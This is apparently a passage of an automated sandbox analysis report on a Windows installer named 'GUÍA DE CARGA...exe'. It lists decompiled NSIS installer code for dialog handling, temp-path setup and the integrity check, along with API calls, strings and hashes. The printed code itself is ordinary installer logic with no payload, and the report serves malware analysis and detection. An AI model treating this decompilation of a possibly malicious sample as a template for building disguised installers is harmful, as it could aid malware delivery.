								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403EA5(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x429060, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x42ecac - _t133; // 0x0
							if(__eflags == 0) {
								_push( *0x42a098);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x429060);
							}
							E00403EB8();
							E00405BC7(0x42a0a0, "dah Setup");
							E00405BE9(0x42a0a0, _t125, _t130,  &(0x42a0a0[lstrlenA(0x42a0a0)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x42a0a0);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x42e3f8);
									 *0x429870 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x42ec20,  *_t130 +  *0x42e400 & 0x0000ffff, _t125,  *(0x4091b0 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x42e3f8 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403E83(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x42e3f8, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42e3ec - _t133; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x42e3f8, 8);
									E00403ECF(0x405);
									goto L58;
								}
								__eflags =  *0x42ecac - _t133; // 0x0
								if(__eflags != 0) {
									goto L61;
								}
								__eflags =  *0x42eca0 - _t133; // 0x0
								if(__eflags != 0) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x42e3f8);
						 *0x42ec28 = _t133;
						EndDialog(_t125,  *0x429468);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x42e3f8, 0x40f, 0, 1);
						__eflags =  *0x42e3ec - _t133; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x42a078, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x42a078,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403EEA(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x42e3f8, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42ecac - _t133; // 0x0
										if(__eflags == 0) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x429468 = 1;
											L21:
											_push(0x78);
											L22:
											E00403E5C();
											goto L26;
										}
										E0040140B(_t127);
										 *0x429468 = _t127;
										goto L21;
									}
									__eflags =  *0x4091ac - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x42e3f8);
						 *0x42e3f8 = _a12;
						L58:
						if( *0x42b0a0 == _t133) {
							_t142 =  *0x42e3f8 - _t133; // 0x0
							if(_t142 != 0) {
								ShowWindow(_t125, 0xa);
								 *0x42b0a0 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}
































                        0x004039b9
                        0x004039c2
                        0x00403b03
                        0x00403b07
                        0x00403b0b
                        0x00403b0d
                        0x00403b12
                        0x00403b1d
                        0x00403b28
                        0x00403b2d
                        0x00403b2f
                        0x00403b31
                        0x00403b34
                        0x00403b39
                        0x00403b47
                        0x00403b54
                        0x00403b5b
                        0x00403b5b
                        0x00403b5c
                        0x00403b5c
                        0x00403b61
                        0x00403b67
                        0x00403b6e
                        0x00403b74
                        0x00403b76
                        0x00403bb6
                        0x00403bbb
                        0x00403bc0
                        0x00403bc0
                        0x00403bc5
                        0x00403bce
                        0x00403bd0
                        0x00403bd5
                        0x00403bdb
                        0x00403bdf
                        0x00403bdf
                        0x00403be4
                        0x00403bea
                        0x00000000
                        0x00000000
                        0x00403bf0
                        0x00403bf5
                        0x00403bfb
                        0x00000000
                        0x00000000
                        0x00403c04
                        0x00403c0c
                        0x00403c11
                        0x00403c14
                        0x00403c1a
                        0x00403c1f
                        0x00403c22
                        0x00403c28
                        0x00403c2d
                        0x00403c30
                        0x00403c36
                        0x00403c3e
                        0x00403c44
                        0x00403c4a
                        0x00403c4e
                        0x00403c55
                        0x00403c55
                        0x00403c55
                        0x00403c5f
                        0x00403c71
                        0x00403c7d
                        0x00403c82
                        0x00403c8c
                        0x00403c92
                        0x00403c94
                        0x00403c99
                        0x00403c96
                        0x00403c96
                        0x00403c96
                        0x00403ca9
                        0x00403cc1
                        0x00403cc3
                        0x00403cc9
                        0x00403cde
                        0x00403ccb
                        0x00403cd4
                        0x00403cd6
                        0x00403cd6
                        0x00403ce4
                        0x00403cf4
                        0x00403d05
                        0x00403d0c
                        0x00403d12
                        0x00403d16
                        0x00403d1b
                        0x00403d1d
                        0x00000000
                        0x00403d23
                        0x00403d23
                        0x00403d25
                        0x00000000
                        0x00000000
                        0x00403d2b
                        0x00403d2f
                        0x00403d54
                        0x00403d5a
                        0x00403d60
                        0x00403d62
                        0x00000000
                        0x00000000
                        0x00403d88
                        0x00403d8e
                        0x00403d90
                        0x00403d95
                        0x00000000
                        0x00000000
                        0x00403d9b
                        0x00403d9e
                        0x00403da1
                        0x00403db8
                        0x00403dc4
                        0x00403ddd
                        0x00403de3
                        0x00403de7
                        0x00403dec
                        0x00403df2
                        0x00000000
                        0x00000000
                        0x00403dfc
                        0x00403e07
                        0x00000000
                        0x00403e07
                        0x00403d31
                        0x00403d37
                        0x00000000
                        0x00000000
                        0x00403d3d
                        0x00403d43
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403d49
                        0x00403d1d
                        0x00403e14
                        0x00403e20
                        0x00403e27
                        0x00000000
                        0x00403b78
                        0x00403b78
                        0x00403b7b
                        0x00403bae
                        0x00403bae
                        0x00403bb0
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403bb0
                        0x00403b7d
                        0x00403b81
                        0x00403b86
                        0x00403b88
                        0x00000000
                        0x00000000
                        0x00403b98
                        0x00403ba0
                        0x00000000
                        0x00403ba6
                        0x004039d4
                        0x004039d4
                        0x004039d8
                        0x004039dd
                        0x004039ec
                        0x004039ec
                        0x004039f5
                        0x004039fe
                        0x00403a09
                        0x00403a09
                        0x00403a15
                        0x00403a31
                        0x00403a34
                        0x00403a47
                        0x00403a4d
                        0x00403af0
                        0x00000000
                        0x00403af9
                        0x00403a53
                        0x00403a60
                        0x00403a62
                        0x00403a64
                        0x00403a83
                        0x00403a83
                        0x00403a86
                        0x00403a8b
                        0x00403a8e
                        0x00403a9e
                        0x00403a9f
                        0x00403aa1
                        0x00403ad7
                        0x00403aea
                        0x00000000
                        0x00403aea
                        0x00403aa3
                        0x00403aa9
                        0x00403ac2
                        0x00403ac7
                        0x00403ac9
                        0x00000000
                        0x00000000
                        0x00403acb
                        0x00403ab7
                        0x00403ab7
                        0x00403ab9
                        0x00403ab9
                        0x00000000
                        0x00403ab9
                        0x00403aac
                        0x00403ab1
                        0x00000000
                        0x00403ab1
                        0x00403a90
                        0x00403a96
                        0x00000000
                        0x00000000
                        0x00403a98
                        0x00000000
                        0x00403a98
                        0x00403a88
                        0x00000000
                        0x00403a88
                        0x00403a6e
                        0x00403a75
                        0x00403a7b
                        0x00403a7d
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403a7d
                        0x00403a39
                        0x00000000
                        0x00403a17
                        0x00403a1d
                        0x00403a27
                        0x00403e2d
                        0x00403e33
                        0x00403e35
                        0x00403e3b
                        0x00403e40
                        0x00403e46
                        0x00403e46
                        0x00403e3b
                        0x00403e50
                        0x00000000
                        0x00403e50
                        0x00403a15

                        APIs
                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039EC
                        • ShowWindow.USER32(?), ref: 00403A09
                        • DestroyWindow.USER32 ref: 00403A1D
                        • SetWindowLongA.USER32 ref: 00403A39
                        • GetDlgItem.USER32 ref: 00403A5A
                        • SendMessageA.USER32 ref: 00403A6E
                        • IsWindowEnabled.USER32(00000000), ref: 00403A75
                        • GetDlgItem.USER32 ref: 00403B23
                        • GetDlgItem.USER32 ref: 00403B2D
                        • KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 00403B47
                        • SendMessageA.USER32 ref: 00403B98
                        • GetDlgItem.USER32 ref: 00403C3E
                        • ShowWindow.USER32(00000000,?), ref: 00403C5F
                        • EnableWindow.USER32(?,?), ref: 00403C71
                        • EnableWindow.USER32(?,?), ref: 00403C8C
                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403CA2
                        • EnableMenuItem.USER32 ref: 00403CA9
                        • SendMessageA.USER32 ref: 00403CC1
                        • SendMessageA.USER32 ref: 00403CD4
                        • lstrlenA.KERNEL32(0042A0A0,?,0042A0A0,dah Setup), ref: 00403CFD
                        • SetWindowTextA.USER32(?,0042A0A0), ref: 00403D0C
                        • ShowWindow.USER32(?,0000000A), ref: 00403E40
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: Window$Item$MessageSend$EnableShow$Menu$CallbackDestroyDispatcherEnabledLongSystemTextUserlstrlen
                        • String ID: dah Setup
                        • API String ID: 4050669955-1724706238
                        • Opcode ID: 65fa17c4123709d5ac1524d2e1c09fee4b4826ece0b4f58e8075cf8f39e92c43
                        • Instruction ID: f9ad972cf69bfdf420a9f6130eb54bdd223da945896b7aa78364cccc95eacf8d
                        • Opcode Fuzzy Hash: 65fa17c4123709d5ac1524d2e1c09fee4b4826ece0b4f58e8075cf8f39e92c43
                        • Instruction Fuzzy Hash: 9FC1D331604204AFDB21AF62ED45E2B3F6CEB44706F50053EF641B52E1C779A942DB5E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0040361A, Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                        Download Yara Rule
                        C-Code - Quality: 96%
                        			E0040361A(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				signed int _t24;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				int _t37;
				int _t38;
				intOrPtr _t39;
				int _t42;
				intOrPtr _t60;
				char _t62;
				CHAR* _t64;
				signed char _t68;
				struct HINSTANCE__* _t76;
				CHAR* _t79;
				intOrPtr _t81;
				CHAR* _t85;

				_t81 =  *0x42ec30; // 0x6e1110
				_t20 = E00405F57(3);
				_t88 = _t20;
				if(_t20 == 0) {
					_t79 = 0x42a0a0;
					"1033" = 0x7830;
					E00405AAE(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a0a0, 0);
					__eflags =  *0x42a0a0;
					if(__eflags == 0) {
						E00405AAE(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407342, 0x42a0a0, 0);
					}
					lstrcatA("1033", _t79);
				} else {
					E00405B25("1033",  *_t20() & 0x0000ffff);
				}
				E004038E3(_t76, _t88);
				_t24 =  *0x42ec38; // 0x80
				_t84 = "C:\\Users\\alfons\\AppData\\Local\\Temp";
				 *0x42eca0 = _t24 & 0x00000020;
				 *0x42ecbc = 0x10000;
				if(E0040579B(_t88, "C:\\Users\\alfons\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E0040579B(_t96, _t84) == 0) {
						E00405BE9(0, _t79, _t81, _t84,  *((intOrPtr*)(_t81 + 0x118)));
					}
					_t28 = LoadImageA( *0x42ec20, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x42e408 = _t28;
					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E004038E3(_t76, __eflags);
							__eflags =  *0x42ecc0; // 0x0
							if(__eflags != 0) {
								_t31 = E00404F85(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42e3ec; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x42a078, 5); // executed
							_t37 = E00405EE9("RichEd20"); // executed
							__eflags = _t37;
							if(_t37 == 0) {
								E00405EE9("RichEd32");
							}
							_t85 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t85, 0x42e3c0);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x42e3c0);
								 *0x42e3e4 = _t85;
								RegisterClassA(0x42e3c0);
							}
							_t39 =  *0x42e400; // 0x0
							_t42 = DialogBoxParamA( *0x42ec20, _t39 + 0x00000069 & 0x0000ffff, 0, E004039B0, 0); // executed
							E0040356A(E0040140B(5), 1);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t76 =  *0x42ec20; // 0x400000
						 *0x42e3d4 = _t28;
						_v20 = 0x624e5f;
						 *0x42e3c4 = E00401000;
						 *0x42e3d0 = _t76;
						 *0x42e3e4 =  &_v20;
						if(RegisterClassA(0x42e3c0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x42a078 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42ec20, 0);
						goto L21;
					}
				} else {
					_t76 =  *(_t81 + 0x48);
					if(_t76 == 0) {
						goto L16;
					}
					_t60 =  *0x42ec58; // 0x6e6884
					_t79 = 0x42dbc0;
					E00405AAE( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) + _t60, 0x42dbc0, 0);
					_t62 =  *0x42dbc0; // 0x54
					if(_t62 == 0) {
						goto L16;
					}
					if(_t62 == 0x22) {
						_t79 = 0x42dbc1;
						 *((char*)(E004056E5(0x42dbc1, 0x22))) = 0;
					}
					_t64 = lstrlenA(_t79) + _t79 - 4;
					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
						L15:
						E00405BC7(_t84, E004056BA(_t79));
						goto L16;
					} else {
						_t68 = GetFileAttributesA(_t79);
						if(_t68 == 0xffffffff) {
							L14:
							E00405701(_t79);
							goto L15;
						}
						_t96 = _t68 & 0x00000010;
						if((_t68 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}





























                        0x00403620
                        0x00403629
                        0x00403630
                        0x00403632
                        0x00403646
                        0x00403658
                        0x00403662
                        0x00403667
                        0x0040366d
                        0x00403680
                        0x00403680
                        0x0040368b
                        0x00403634
                        0x0040363f
                        0x0040363f
                        0x00403690
                        0x00403695
                        0x0040369a
                        0x004036a3
                        0x004036a8
                        0x004036b9
                        0x00403740
                        0x00403748
                        0x00403751
                        0x00403751
                        0x00403767
                        0x0040376d
                        0x0040377b
                        0x0040380a
                        0x00403812
                        0x0040381c
                        0x00403821
                        0x00403827
                        0x004038b1
                        0x004038b6
                        0x004038b8
                        0x004038d4
                        0x00000000
                        0x004038d4
                        0x004038ba
                        0x004038c0
                        0x004038c8
                        0x004038c8
                        0x00000000
                        0x004038c0
                        0x00403835
                        0x00403840
                        0x00403845
                        0x00403847
                        0x0040384e
                        0x0040384e
                        0x00403859
                        0x00403861
                        0x00403863
                        0x00403865
                        0x0040386e
                        0x00403871
                        0x00403877
                        0x00403877
                        0x0040387d
                        0x00403896
                        0x004038a7
                        0x00000000
                        0x004038ac
                        0x00403814
                        0x00403816
                        0x00000000
                        0x00403781
                        0x00403781
                        0x00403787
                        0x00403791
                        0x00403799
                        0x004037a3
                        0x004037a9
                        0x004037b7
                        0x004038d9
                        0x004038d9
                        0x00000000
                        0x004038d9
                        0x004037bd
                        0x004037c6
                        0x00403805
                        0x00000000
                        0x00403805
                        0x004036bf
                        0x004036bf
                        0x004036c4
                        0x00000000
                        0x00000000
                        0x004036c9
                        0x004036ce
                        0x004036de
                        0x004036e3
                        0x004036ea
                        0x00000000
                        0x00000000
                        0x004036ee
                        0x004036f0
                        0x004036fd
                        0x004036fd
                        0x00403705
                        0x0040370b
                        0x00403733
                        0x0040373b
                        0x00000000
                        0x0040371d
                        0x0040371e
                        0x00403727
                        0x0040372d
                        0x0040372e
                        0x00000000
                        0x0040372e
                        0x00403729
                        0x0040372b
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040372b
                        0x0040370b

                        APIs
                          • Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                          • Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?), ref: 00405F84
                        • lstrcatA.KERNEL32(1033,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000,00000003,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe" ,00000000), ref: 0040368B
                        • lstrlenA.KERNEL32(TclpOwkq,?,?,?,TclpOwkq,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000,00000003,C:\Users\user\AppData\Local\Temp\), ref: 00403700
                        • lstrcmpiA.KERNEL32(?,.exe,TclpOwkq,?,?,?,TclpOwkq,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000), ref: 00403713
                        • GetFileAttributesA.KERNEL32(TclpOwkq), ref: 0040371E
                        • LoadImageA.USER32 ref: 00403767
                          • Part of subcall function 00405B25: wsprintfA.USER32 ref: 00405B32
                        • RegisterClassA.USER32 ref: 004037AE
                        • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004037C6
                        • CreateWindowExA.USER32 ref: 004037FF
                        • ShowWindow.USER32(00000005,00000000), ref: 00403835
                        • GetClassInfoA.USER32 ref: 00403861
                        • GetClassInfoA.USER32 ref: 0040386E
                        • RegisterClassA.USER32 ref: 00403877
                        • DialogBoxParamA.USER32 ref: 00403896
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                        • String ID: "C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$TclpOwkq$_Nb
                        • API String ID: 1975747703-2585094906
                        • Opcode ID: 68b385dab8efbc3c057c942a316a407ac7ea9197ea381ea52f3d6580dbe3b634
                        • Instruction ID: 439cf4cca7a437fbaee012d0436cdd450a481f2d9ea16570e6e497c3a9acd7f8
                        • Opcode Fuzzy Hash: 68b385dab8efbc3c057c942a316a407ac7ea9197ea381ea52f3d6580dbe3b634
                        • Instruction Fuzzy Hash: 4861C6B16042007EE220BF629C45E273AACEB44759F44447FF941B62E2DB7DA9418A3E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00402C55, Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182COMMON
                        Download Yara Rule
                        C-Code - Quality: 80%
                        			E00402C55(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				signed int _t54;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t67;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\Users\\alfons\\Desktop\\GU#U00cdA DE CARGA...exe";
				 *0x42ec2c = _t43 + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\alfons\\Desktop\\GU#U00cdA DE CARGA...exe", 0x400);
				_t89 = E0040589E(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x409014 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\Users\\alfons\\Desktop";
				E00405BC7("C:\\Users\\alfons\\Desktop", _t91);
				E00405BC7(0x436000, E00405701(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x428c50 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402BF1(1);
					__eflags =  *0x42ec34 - _t82; // 0x8800
					if(__eflags == 0) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						_t54 =  *0x42ec34; // 0x8800
						E004030E2(_t54 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E00402E8E(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x42ec30 = _t94;
							 *0x42ec38 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x42ec3c =  *0x42ec3c + 1;
								__eflags =  *0x42ec3c;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E0040585F(0x42ec40, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E004030E2( *0x414c40);
					_t65 = E004030B0( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t67 =  *0x42ec34; // 0x8800
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~_t67 & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E004030B0(0x420c50, _t90); // executed
						__eflags = _t71;
						if(_t71 == 0) {
							E00402BF1(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x42ec34;
						if( *0x42ec34 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402BF1(0);
							}
							goto L20;
						}
						E0040585F( &_v44, 0x420c50, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x414c40; // 0x8800
						 *0x42ecc0 =  *0x42ecc0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x42ec34 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t93 = _t80 - 4;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x428c50;
						if(_t93 <  *0x428c50) {
							_v12 = E00405FC6(_v12, 0x420c50, _t90);
						}
						 *0x414c40 =  *0x414c40 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

































                        0x00402c5d
                        0x00402c60
                        0x00402c63
                        0x00402c66
                        0x00402c6c
                        0x00402c7d
                        0x00402c82
                        0x00402c95
                        0x00402c9a
                        0x00402c9d
                        0x00402ca3
                        0x00000000
                        0x00402ca5
                        0x00402cb0
                        0x00402cb6
                        0x00402cc7
                        0x00402cce
                        0x00402cd4
                        0x00402cd6
                        0x00402cdb
                        0x00402cdd
                        0x00402dca
                        0x00402dcc
                        0x00402dd1
                        0x00402dd8
                        0x00000000
                        0x00000000
                        0x00402dda
                        0x00402ddd
                        0x00402e01
                        0x00402e06
                        0x00402e0c
                        0x00402e0e
                        0x00402e17
                        0x00402e1c
                        0x00402e1f
                        0x00402e20
                        0x00402e21
                        0x00402e23
                        0x00402e28
                        0x00402e2b
                        0x00402e3e
                        0x00402e42
                        0x00402e4a
                        0x00402e4f
                        0x00402e51
                        0x00402e51
                        0x00402e51
                        0x00402e59
                        0x00402e59
                        0x00402e5c
                        0x00402e5d
                        0x00402e5d
                        0x00402e60
                        0x00402e62
                        0x00402e62
                        0x00402e62
                        0x00402e6c
                        0x00402e72
                        0x00402e80
                        0x00402e85
                        0x00000000
                        0x00402e85
                        0x00000000
                        0x00402e2b
                        0x00402de5
                        0x00402df0
                        0x00402df5
                        0x00402df7
                        0x00000000
                        0x00000000
                        0x00402dfc
                        0x00402dff
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00402ce3
                        0x00402ce8
                        0x00402ce8
                        0x00402ced
                        0x00402cf1
                        0x00402cf8
                        0x00402cfd
                        0x00402cff
                        0x00402d01
                        0x00402d01
                        0x00402d05
                        0x00402d0a
                        0x00402d0c
                        0x00402e36
                        0x00402e2d
                        0x00000000
                        0x00402e2d
                        0x00402d12
                        0x00402d19
                        0x00402d95
                        0x00402d99
                        0x00402d9d
                        0x00402da2
                        0x00000000
                        0x00402d99
                        0x00402d22
                        0x00402d27
                        0x00402d2a
                        0x00402d2f
